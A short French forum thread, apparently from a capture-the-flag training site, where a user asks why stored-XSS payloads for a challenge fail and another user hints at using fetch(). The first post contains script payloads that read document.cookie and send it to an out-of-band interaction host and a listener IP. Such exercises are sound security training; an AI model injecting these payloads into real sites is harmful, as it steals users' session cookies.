Web - Client

mardi 31 décembre 2024, 23:46  #1
Web - Client- XSS Stockée 1
Lil_zeubi
Lil_zeubi
  • 1 posts

Bonjour,
Un poste pour avoir une piste de ce qui pourrait bloqué sur ce challenge. Malgré les différents script que je rentre dans la case message :

<script>
var i = new Image();
i.src = "cxt751mz1wg0000bpc00gq7d1tyyyyyyb.oast.pro" + encodeURIComponent(document.cookie);
</script><script>
var i = new Image();<br />
i.src = "http://192.168.1.1:8080/cookie?data=" + encodeURIComponent(document.cookie);</script>

mes serveurs (request bin, python) ne reçoit pas de requête de la par du site challenge.

le javascript est bien activé sur mon navigateur et le

<script>
alert(document.cookie)
</script>

fonctionne.

Pouvez vous m’indiquer quelle paramètre je dois regarder (par-feu, script...)

Merci d’avance.

mercredi 15 janvier 2025, 15:54  #2
Web - Client- XSS Stockée 1
The GratefulMan
The GratefulMan
  • 3 posts

Bonjour,
Tu dois utiliser du javascript

Et je te donne un indice : fetch()

Nouvelle réponse Nouvelle réponse   Nouveau sujet Nouveau sujet